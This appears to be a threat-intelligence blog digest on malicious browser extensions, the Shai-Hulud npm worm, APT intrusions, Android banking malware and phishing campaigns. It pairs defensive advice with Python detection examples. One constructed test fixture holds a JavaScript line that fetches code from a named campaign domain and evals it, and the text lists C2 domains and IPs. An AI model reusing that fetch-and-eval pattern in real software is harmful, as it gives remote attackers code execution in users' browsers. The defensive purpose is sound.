EvilBit Threat Digest - Malicious Extensions, APT Overlap, Mobile Banking Malware
4.3M malicious extensions, evolving npm worm and BEC, overlapping APTs, advanced Android banking trojans, and a Rust-based Linux APT toolkit.
KryptoKat here. The last few days have been a study in scope and stealth. While everyone's still cleaning up from the npm supply-chain mess we covered last week, attackers moved on to poisoning browser extensions at a scale that makes you question every "Add to Chrome" button you've ever clicked, APT groups literally tripped over each other inside the same Russian networks, and mobile banking malware evolved enough features to qualify as a fintech startup. Let's dig into what actually matters for defenders who are tired of playing whack-a-mole with the same old IOCs.
Browser Extensions: 4.3 Million Infections and Counting
The headline story this week is ShadyPanda, a seven-year campaign that weaponized trusted browser extensions to infect 4.3 million Chrome and Edge users. Koi Security's analysis documents a masterclass in patient, persistent compromise that should fundamentally change how you think about extension security.
The campaign evolved in three distinct phases. In the early years (2018–2021), attackers hijacked popular extensions like Clean Master and Speedtest Pro and silently updated them to inject affiliate fraud scripts. Users saw no difference in functionality; the extensions still worked exactly as advertised while generating revenue for the attackers via hijacked clicks and search traffic.
Phase two (2024) marked a shift to remote code execution. The attackers pushed updates that fetched and executed arbitrary JavaScript from their C2 infrastructure. Extensions like WeTab and others started making outbound calls to domains like extensionplay.com and cleanmasters.store, downloading obfuscated payloads that could turn infected browsers into full surveillance platforms. This phase gave them real-time control over millions of endpoints without ever triggering a binary execution alert.
Phase three--still ongoing--focuses on full browser surveillance and data exfiltration. The malware now captures browsing history, form data, cookies, and session tokens, exfiltrating everything to Chinese servers. The payload delivery mechanism is sophisticated: extensions phone home for encrypted JavaScript, decode it in memory, and execute it in the browser context. Most endpoint security tools never see it because there's no file on disk and the code runs in a process users trust implicitly.
For defenders, this is a wake-up call. Your EDR doesn't see what happens inside the browser sandbox. Your network monitoring probably whitelisted *.chrome.google.com and *.microsoftedge.com update checks years ago. And your users installed these extensions because they were in the official stores with five-star reviews.
Immediate actions:
- Audit installed extensions across your fleet using Chrome Enterprise policies or Edge management tools.
- Block the listed IOCs--domains like extensionplay.com, cleanmasters.store, and the full list in Koi's report.
- Deploy browser extension monitoring that alerts on JavaScript fetch calls to non-CDN domains.
- Consider allowlisting approved extensions rather than blocklisting known-bad ones.
- Review your Chrome/Edge management policies to restrict extension installs to admin-approved sources.
This campaign demonstrates that supply-chain risk doesn't stop at your build pipeline. Every browser extension is a potential backdoor, and seven years of undetected activity proves that most organizations have no visibility into this attack surface.
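To make the audit bullets concrete, here is an added example (mine, not code from Koi's report or from the campaign) that checks an unpacked extension against an allowlist and flags the phase-two pattern of fetching and eval-ing JavaScript from a non-CDN host. The trusted-suffix list and the extension id are assumptions; the sample script is constructed, although the domain it contacts is one named in the report.

```python
import re

# Hosts under these suffixes count as legitimate CDN/vendor traffic; adjust to your environment (assumption).
TRUSTED_SUFFIXES = ("googleapis.com", "gstatic.com", "cdnjs.cloudflare.com")
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)
# Constructs that execute code which was not shipped inside the extension package itself.
DYNAMIC_EXEC_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(|importScripts\s*\(")

def external_hosts(script):
    """Hosts referenced in a script that are not a trusted host or a subdomain of one."""
    hosts = {h.lower() for h in URL_RE.findall(script)}
    return {h for h in hosts
            if not any(h == s or h.endswith("." + s) for s in TRUSTED_SUFFIXES)}

def audit_extension(ext_id, manifest, scripts, allowlist):
    """Return findings for one unpacked extension: allowlist status, risky manifest entries, remote code."""
    findings = []
    if ext_id not in allowlist:
        findings.append(f"{ext_id}: not on the approved allowlist")
    if manifest.get("manifest_version", 3) < 3:
        findings.append(f"{ext_id}: Manifest V2, which still permits remotely hosted code")
    if "<all_urls>" in manifest.get("permissions", []) + manifest.get("host_permissions", []):
        findings.append(f"{ext_id}: requests access to every site (<all_urls>)")
    for path, body in scripts.items():
        for host in sorted(external_hosts(body)):
            findings.append(f"{ext_id}: {path} contacts non-CDN host {host}")
        if DYNAMIC_EXEC_RE.search(body):
            findings.append(f"{ext_id}: {path} executes dynamically loaded code")
    return findings

# Constructed sample modelled on the phase-two behaviour described above: fetch a payload from a
# campaign domain named in Koi's report and eval() it. The extension id is a made-up placeholder.
SAMPLE_ID = "abcdefghijklmnopabcdefghijklmnop"
SAMPLE_MANIFEST = {"manifest_version": 2, "permissions": ["tabs", "<all_urls>"]}
SAMPLE_SCRIPTS = {"background.js": "fetch('https://extensionplay.com/u').then(r => r.text()).then(c => eval(c));"}

if __name__ == "__main__":
    for finding in audit_extension(SAMPLE_ID, SAMPLE_MANIFEST, SAMPLE_SCRIPTS, allowlist=set()):
        print(finding)
```

Point it at the extension directories under each user's Chrome or Edge profile (manifest.json plus the scripts it references) and feed the allowlist from your enterprise policy.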
NPM Supply Chain: Shai-Hulud Keeps Spreading
Speaking of supply chains: Shai-Hulud 2.0 is still active and evolving. We covered the initial campaign last week, but the situation has gotten worse. Zscaler's updated analysis shows the worm has now infected over 700 packages, exfiltrated secrets from 27,000+ GitHub repositories, and expanded its payload to include destructive capabilities--a "dead man's switch" that wipes systems if certain anti-analysis conditions are detected.
The self-propagation mechanism is what makes this dangerous. Once a developer's npm or GitHub tokens are stolen, the worm uses them to publish new infected versions of legitimate packages, backdoor GitHub Actions workflows, and register self-hosted runners labeled SHA1HULUD. Each compromised developer becomes a distribution point for further infections.
If you haven't already:
- Rotate all npm tokens, GitHub personal access tokens, and cloud credentials (AWS, Azure, GCP).
- Hunt for GitHub Actions workflows named discussion.yaml or formatter_*.yml in your repositories.
- Audit self-hosted runners for unexpected registrations (especially anything labeled SHA1HULUD).
- Pin package versions in your package-lock.json and verify checksums before installation.
- Implement network egress filtering to block unexpected calls to bun.sh and related infrastructure during CI/CD builds.
The full technical writeup from SentinelOne includes file hashes and YARA rules for hunting. Treat this as an ongoing incident, not a one-time cleanup.
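The "verify checksums" bullet deserves a worked example, so here is an added one (mine, not from Zscaler, SentinelOne or npm) that checks package-lock.json entries the way npm's own integrity check does: parse the Subresource-Integrity string, hash the fetched tarball, and compare, while also flagging entries resolved from somewhere other than the registry. The approved-registry set is an assumption; the lockfile and tarball bytes are constructed.

```python
import base64
import hashlib
import hmac
from urllib.parse import urlparse

REGISTRY_HOSTS = {"registry.npmjs.org"}  # assumption: only the public registry is an approved source
STRONG_ALGOS = {"sha512", "sha384"}

def parse_sri(integrity):
    """Split an SRI string such as 'sha512-<base64>' into (algorithm, raw digest)."""
    algo, _, b64 = integrity.partition("-")
    return algo.lower(), base64.b64decode(b64, validate=True)

def check_lock_entry(name, entry, tarball):
    """Findings for one package-lock.json 'packages' entry, compared with the bytes actually fetched."""
    findings = []
    resolved = entry.get("resolved", "")
    if urlparse(resolved).hostname not in REGISTRY_HOSTS:
        findings.append(f"{name}: resolved from unapproved source {resolved or '<none>'}")
    if not entry.get("integrity"):
        return findings + [f"{name}: no integrity field, tarball cannot be verified"]
    try:
        algo, expected = parse_sri(entry["integrity"])
        actual = hashlib.new(algo, tarball).digest()
    except ValueError:  # bad base64 or an algorithm hashlib does not know
        return findings + [f"{name}: malformed integrity string {entry['integrity']!r}"]
    if algo not in STRONG_ALGOS:
        findings.append(f"{name}: weak integrity algorithm {algo}")
    if not hmac.compare_digest(actual, expected):
        findings.append(f"{name}: fetched tarball does not match lockfile integrity")
    return findings

def check_lockfile(lock, fetched):
    """Run check_lock_entry over every package; `fetched` maps package path to its downloaded tarball bytes."""
    return {name: check_lock_entry(name, entry, fetched.get(name, b""))
            for name, entry in lock["packages"].items()}

def sri(algo, data):
    """Build an SRI string, used here only to construct the sample lockfile."""
    return f"{algo}-" + base64.b64encode(hashlib.new(algo, data).digest()).decode()

# Constructed lockfile and tarball bytes (not real packages): one clean entry, one resolved from a
# non-registry host with a weak, non-matching hash.
SAMPLE_TARBALL = b"constructed tarball bytes standing in for good-pkg-1.2.3.tgz"
SAMPLE_LOCK = {"packages": {
    "node_modules/good-pkg": {"version": "1.2.3", "integrity": sri("sha512", SAMPLE_TARBALL),
                              "resolved": "https://registry.npmjs.org/good-pkg/-/good-pkg-1.2.3.tgz"},
    "node_modules/tampered-pkg": {"version": "4.5.6", "integrity": sri("sha1", b"something else"),
                                  "resolved": "https://mirror.example.invalid/tampered-pkg-4.5.6.tgz"},
}}
SAMPLE_FETCHED = {"node_modules/good-pkg": SAMPLE_TARBALL, "node_modules/tampered-pkg": b"swapped payload"}
```

Run check_lockfile over the real lock and the tarballs in your npm cache before `npm ci`; a mismatch or a non-registry `resolved` URL on a package you did not change is exactly the kind of republished version the worm produces.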
When APTs Collide: QuietCrabs and Thor Trade Elbows in Russia
One of the more fascinating threat intelligence stories this week is Positive Technologies' report on QuietCrabs and Thor, two distinct threat groups that independently breached the same Russian organizations and literally bumped into each other mid-intrusion.
QuietCrabs is an espionage-focused group exploiting recent Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) and Ivanti EPMM (CVE-2025-4427, CVE-2025-4428) vulnerabilities within hours of PoC publication. They deploy a Rust-based loader called KrustyLoader, which injects Sliver C2 beacons into memory. Their operational security is excellent: average dwell time of 393 days, minimal forensic artifacts, and careful use of legitimate cloud services for staging. They target defense, healthcare, and U.S. organizations.
Thor, on the other hand, is a ransomware group with the subtlety of a sledgehammer. They've hit 110+ Russian organizations using noisy reconnaissance tools (ADRecon, Mimikatz), commercial RATs (Tactical RMM, MeshAgent), and prep for LockBit and Babuk ransomware deployment. Their tradecraft is loud, messy, and effective.
The interesting part is the overlap: Positive Technologies documented instances where both groups were active in the same network simultaneously, each unaware of the other's presence. The researchers were able to differentiate them based on tooling, TTPs, and infrastructure, but the victim organizations had no idea they were dealing with multiple intrusions at once.
This is a good reminder to threat hunters: if you find one actor, keep digging. Compromised organizations attract opportunistic follow-on attacks, and your incident may be more complex than a single threat group's playbook.
For defenders:
- Patch SharePoint and Ivanti immediately (patches available for all listed CVEs).
- Hunt for webshells in SharePoint and IIS directories--PowerShell one-liners and ASPX backdoors are common.
- Monitor for KrustyLoader indicators: .text section markers, suspicious relocated.exe or __selfdelete__ files in %TEMP%.
- Block the C2 infrastructure listed in PT Security's IOC feed.
- Correlate activity across multiple endpoints--if you see both stealthy Sliver beacons and noisy Mimikatz execution, you may be dealing with overlapping intrusions.
Mobile Malware Gets a Promotion: Banking Trojans Go Professional
The mobile threat landscape this week showcased three distinct campaigns that demonstrate how mature Android banking malware has become.
Albiriox: MaaS for On-Device Fraud
Cleafy's analysis of Albiriox describes a Russian-operated Malware-as-a-Service RAT targeting over 400 banking and cryptocurrency apps globally. The malware combines VNC-based screen streaming, overlay attacks, and Accessibility Services abuse to enable "on-device fraud"--attackers remotely control the victim's phone in real time to authorize transactions, transfer funds, and bypass two-factor authentication.
The VNC implementation bypasses Android's FLAG_SECURE protection, which is supposed to prevent screenshots and screen recordings of sensitive apps. By hooking into the Accessibility framework at a low level, Albiriox can capture screen content even from apps that explicitly block it. Attackers see exactly what the victim sees and can interact with apps as if they were sitting at the device.
The malware is distributed via phishing SMS and fake app stores, primarily targeting users in Europe, North America, and Asia-Pacific. Once installed, it requests Accessibility Services permissions and Device Administrator rights--both of which are common red flags that most users ignore.
GoldFactory: APAC Banking with Biometric Theft
Group-IB's research on GoldFactory highlights a separate campaign focused on Asia-Pacific banking apps. The threat group distributes trojanized versions of legitimate banking apps that include a new variant called Gigaflower, which adds OCR and QR code scanning capabilities to enhance credential theft. The malware steals biometric data, SMS messages, and one-time passwords, enabling full account takeover.
What's notable is the shared criminal infrastructure: GoldFactory uses the same backend systems and exfiltration channels across multiple malware families, suggesting a well-organized operation with centralized command-and-control.
IRATA: SMS-Propagating RAT Targeting Iran
AhnLab uncovered IRATA, an Android RAT specifically targeting Iranian users via SMS smishing. The malware uses geographic evasion (blocking non-Iranian IP addresses), deploys credential-phishing overlays for local banking apps, and self-propagates by hijacking the victim's contact list to send additional smishing messages. It's a worm, essentially, with a narrow geographic focus but an effective replication mechanism.
For defenders managing mobile endpoints:
- Enforce policies that disable sideloading from untrusted sources (Settings → Security → Install unknown apps).
- Monitor for Accessibility Services grants to non-system apps--alert on any app that requests these permissions.
- Blocklist the IOCs published by Cleafy, Group-IB, and AhnLab in your mobile device management (MDM) platform.
- Educate users that no legitimate app needs both Accessibility Services and Device Administrator permissions.
- Deploy mobile threat defense (MTD) solutions that can detect overlay attacks and screen recording abuse.
BEC and Phishing: EvilProxy Hits Universities, VendorVandals Casts Wide
Evilginx Targets University SSO
Infoblox Threat Intel documented an ongoing campaign using Evilginx adversary-in-the-middle (AitM) phishing to target at least 18 U.S. universities. The attackers registered typosquatted domains mimicking Shibboleth SSO portals, used TinyURL to obfuscate links in phishing emails, and deployed Evilginx 3.0 to intercept and replay session cookies even when users have multi-factor authentication enabled.
The campaign is notable for its DNS infrastructure patterns--Infoblox identified 67 malicious domains and 15 C2 IP addresses based on anomalous DNS query patterns and certificate similarities. The attackers are using Cloudflare for hosting, which complicates takedown efforts.
For higher-ed IT teams:
- Block the listed domains at the DNS layer (IOCs available in Infoblox's GitHub repo).
- Deploy phishing-resistant MFA (FIDO2 hardware keys) for administrative accounts.
- Monitor for anomalous login patterns--new device + new location + successful MFA should trigger review.
- Educate users to manually navigate to SSO portals rather than clicking email links.
VendorVandals: WeTransfer Delivers Credential Phishing
Invictus Incident Response published a detailed teardown of a BEC campaign they call VendorVandals, which targets biotech, pharma, and tech sectors in the U.S., EU, and India. The attackers send phishing emails containing WeTransfer or Dropbox links to HTML attachments that load EvilProxy AitM pages. The goal is to harvest Microsoft 365 credentials and session tokens for follow-on BEC fraud.
The infrastructure pivots in the Invictus report are valuable--they identified shared C2 domains, Tor exit nodes (109.70.100.68, 109.70.100.71), and targeting patterns that suggest a single organized group.
For SOC teams:
- Require MFA for risky sign-ins (new device/location) and restrict access to compliant/managed devices.
- Monitor email traces for WeTransfer and Dropbox shares containing HTML attachments.
- Deploy conditional access policies that block logins from anonymization services (Tor, VPNs) unless explicitly allowlisted.
- Hunt using the IOCs published on GitHub.
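Both phishing sections above boil down to the same two sign-in rules, so here is one added example (mine, not code from Infoblox or Invictus) that runs them over constructed sign-in events: an MFA success from a device and country never seen for that user, which is what a proxied Evilginx or EvilProxy login looks like to the identity provider, and any sign-in from a known Tor exit. The two Tor addresses are the ones quoted in the Invictus report; the log format and the events are constructed.

```python
import ipaddress
from collections import defaultdict

# Tor exit addresses named in the Invictus VendorVandals report; in production, refresh from a live exit list.
KNOWN_TOR_EXITS = {ipaddress.ip_address("109.70.100.68"), ipaddress.ip_address("109.70.100.71")}

# Constructed sign-in events (not real logs): time,user,source_ip,country,device_id,mfa_result
SAMPLE_EVENTS = """\
2025-12-01T08:02:11Z,alice@example.edu,203.0.113.7,US,dev-a1,success
2025-12-01T09:15:40Z,alice@example.edu,203.0.113.7,US,dev-a1,success
2025-12-02T03:41:05Z,alice@example.edu,198.51.100.23,NL,dev-z9,success
2025-12-02T04:10:19Z,bob@example.edu,109.70.100.68,DE,dev-b2,success
2025-12-02T10:00:00Z,carol@example.edu,192.0.2.55,US,dev-c3,failure
"""

def parse_events(text):
    """Turn the CSV-like lines above into dicts; source IPs are parsed so they compare as addresses."""
    for line in text.splitlines():
        ts, user, ip, country, device, mfa = line.split(",")
        yield {"ts": ts, "user": user, "ip": ipaddress.ip_address(ip),
               "country": country, "device": device, "mfa": mfa}

def detect_suspicious_signins(events):
    """Rule 1: MFA success from a device AND country never seen for the user (proxied AitM login).
    Rule 2: any sign-in from a known Tor exit.
    Baselines are built from the user's earlier successful sign-ins in the same stream."""
    seen_devices, seen_countries = defaultdict(set), defaultdict(set)
    alerts = []
    for ev in events:
        user = ev["user"]
        if ev["ip"] in KNOWN_TOR_EXITS:
            alerts.append((ev["ts"], user, "sign-in from known Tor exit"))
        has_baseline = bool(seen_devices[user])  # a user's very first login cannot be "new"
        new_device = ev["device"] not in seen_devices[user]
        new_country = ev["country"] not in seen_countries[user]
        if ev["mfa"] == "success" and has_baseline and new_device and new_country:
            alerts.append((ev["ts"], user, "MFA success from new device and new country"))
        if ev["mfa"] == "success":  # only successful logins extend the baseline
            seen_devices[user].add(ev["device"])
            seen_countries[user].add(ev["country"])
    return alerts

if __name__ == "__main__":
    for alert in detect_suspicious_signins(parse_events(SAMPLE_EVENTS)):
        print(*alert)
```

The baseline here is built from the same stream; against real IdP logs you would seed it from a trailing window of successful sign-ins so the first event of the day is not treated as a user's first ever.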
Linux Gets the Rust Treatment: Snake Rustamania and Friends
Snake Rustamania: ELF Patching with TLS GREASE C2
Solar 4RAYS' analysis of the Shedding Zmiy APT's Rust-based toolkit is a technical deep-dive worth your time. The chain consists of three components:
Octopus: A privilege escalation module that exploits known local privilege escalation CVEs (CVE-2021-3156, CVE-2021-4034, CVE-2022-2588, CVE-2023-4911) or abuses GTFOBins techniques to gain root. Once elevated, it patches ELF binaries on disk--specifically system services like cron, sshd, and nginx--by modifying their .dynamic and .dynstr sections to preload malicious libraries.
Leech: The malicious library injected via ELF patching. It hooks into legitimate services, establishes persistence, and communicates with C2 using TLS connections with GREASE extensions (random cipher suites and extensions that look like legitimate TLS noise). This makes the C2 traffic blend in with normal HTTPS, evading basic network monitoring.
Mycelium: An HTTP/2-based management API that operators use to task implants, exfiltrate data, and pivot to additional targets.
The tradecraft is sophisticated--ELF dynamic section tampering is rare, and the use of TLS GREASE for C2 is creative. For Linux defenders, this is a reminder to:
- Patch the listed CVEs immediately (especially sudo, polkit, and glibc).
- Implement file integrity monitoring on system binaries in /usr/bin and /usr/sbin.
- Hunt for anomalous .dynamic section modifications using tools like readelf and checksec.
- Monitor for unexpected TLS GREASE extensions in SSH and HTTP traffic (they're valid but rare outside browser contexts).
- Block LD_PRELOAD in service configurations where it's not explicitly required.
The IOC list includes 24 file hashes and C2 infrastructure.
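For the .dynamic hunt, readelf -d will show you the entries, but comparing them against a baseline across a fleet is easier in a script. This added example (mine, not part of Solar 4RAYS' report or the toolkit) walks an ELF64 binary's .dynamic section, lists its DT_NEEDED libraries, and reports any not in the known-good set for that binary; an injected DT_NEEDED entry is the simplest way patching .dynamic and .dynstr makes the loader pull in an extra library. The baseline and the library names are assumptions, and the sample ELF is constructed in code so the example runs offline.

```python
import struct

SHT_STRTAB, SHT_DYNAMIC = 3, 6
DT_NULL, DT_NEEDED = 0, 1

def section_headers(elf):
    """Yield (type, offset, size, link) for each section header of a little-endian ELF64 image."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    e_shoff, = struct.unpack_from("<Q", elf, 0x28)
    e_shentsize, e_shnum = struct.unpack_from("<HH", elf, 0x3A)
    for i in range(e_shnum):
        _n, typ, _f, _a, off, size, link = struct.unpack_from("<IIQQQQI", elf, e_shoff + i * e_shentsize)
        yield typ, off, size, link

def needed_libraries(elf):
    """Walk .dynamic and return its DT_NEEDED names; an injected entry here makes ld.so load that library."""
    headers = list(section_headers(elf))
    dynamic = [h for h in headers if h[0] == SHT_DYNAMIC]
    if not dynamic:
        return []  # no dynamic section: nothing can be injected this way
    _t, off, size, link = dynamic[0]
    _t, str_off, str_size, _l = headers[link]  # sh_link of .dynamic points at .dynstr
    strtab, names = elf[str_off:str_off + str_size], []
    for pos in range(off, off + size, 16):  # Elf64_Dyn is a 16-byte (d_tag, d_val) pair
        tag, val = struct.unpack_from("<qQ", elf, pos)
        if tag == DT_NULL:
            break
        if tag == DT_NEEDED:
            names.append(strtab[val:strtab.index(b"\0", val)].decode())
    return names

def unexpected_libraries(elf, baseline):
    """DT_NEEDED names not in the known-good baseline recorded for this binary (e.g. from a clean package)."""
    return [n for n in needed_libraries(elf) if n not in baseline]

def build_sample_elf(needed):
    """Constructed minimal ELF64 (header, .dynstr, .dynamic, .shstrtab only) so the example runs offline."""
    dynstr, dyn = b"\0", b""
    for n in needed:  # each DT_NEEDED value is the name's offset inside .dynstr
        dyn += struct.pack("<qQ", DT_NEEDED, len(dynstr))
        dynstr += n.encode() + b"\0"
    dyn += struct.pack("<qQ", DT_NULL, 0)
    shstr = b"\0.dynstr\0.dynamic\0.shstrtab\0"
    o1, o2, o3 = 64, 64 + len(dynstr), 64 + len(dynstr) + len(dyn)
    shdr = lambda name, typ, off, size, link: struct.pack("<IIQQQQIIQQ", name, typ, 0, 0, off, size, link, 0, 1, 0)
    shdrs = (shdr(0, 0, 0, 0, 0) + shdr(1, SHT_STRTAB, o1, len(dynstr), 0)
             + shdr(9, SHT_DYNAMIC, o2, len(dyn), 1) + shdr(18, SHT_STRTAB, o3, len(shstr), 0))
    ehdr = b"\x7fELF\x02\x01\x01" + b"\0" * 9 + struct.pack("<HHIQQQIHHHHHH", 3, 62, 1, 0, 0, o3 + len(shstr), 0, 64, 0, 0, 64, 4, 3)
    return ehdr + dynstr + dyn + shstr + shdrs
```

On a real host, read /usr/sbin/sshd (or cron, nginx) into bytes and compare against the DT_NEEDED list recorded from the distribution package; the parser only covers section-header-bearing ELF64 files, so a binary with its section headers stripped needs the program-header (PT_DYNAMIC) route instead.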
Chinese APT Targets Uzbekistan with Cobalt Strike
In a smaller but still noteworthy campaign, TG Soft documented a Chinese APT operation targeting Uzbekistan government entities. The attackers used LNK droppers with embedded PowerShell extraction scripts to deploy DLL side-loading chains that ultimately inject Cobalt Strike beacons into memory. The C2 domains (revitpourtous.com, wikipedla.blog) are typosquats designed to evade casual inspection.
The campaign is ongoing, and the TTPs align with typical Chinese espionage operations: patient reconnaissance, minimal malware footprint, and abuse of legitimate administrative tools for lateral movement. Hunt for LNK files with windowstyle hidden, monitor for GameHook.exe loading unexpected DLLs, and block the listed IOCs.
Closing Thoughts: Trust Is a Vulnerability
This week reinforced a lesson we've learned over and over: the systems we trust implicitly--browser extensions, npm packages, system libraries--are the ones attackers weaponize most effectively. ShadyPanda infected 4.3 million browsers because users trusted the Chrome Web Store. Shai-Hulud spread through 700+ npm packages because developers trusted npm install. Snake Rustamania persisted by patching ELF binaries that defenders assumed were immutable.
The fundamentals haven't changed, but the attack surface has expanded into every layer of abstraction we've built to make our lives easier. Audit your extensions. Pin your dependencies. Monitor your binaries. And remember: if it updates automatically, it's a potential vector.
Patch what you can, hunt what you can't, and assume that anything you didn't personally compile is probably compromised somewhere on the supply chain.
We'll see you when the next campaign breaks. In the meantime, check your browser extensions.
-- KryptoKat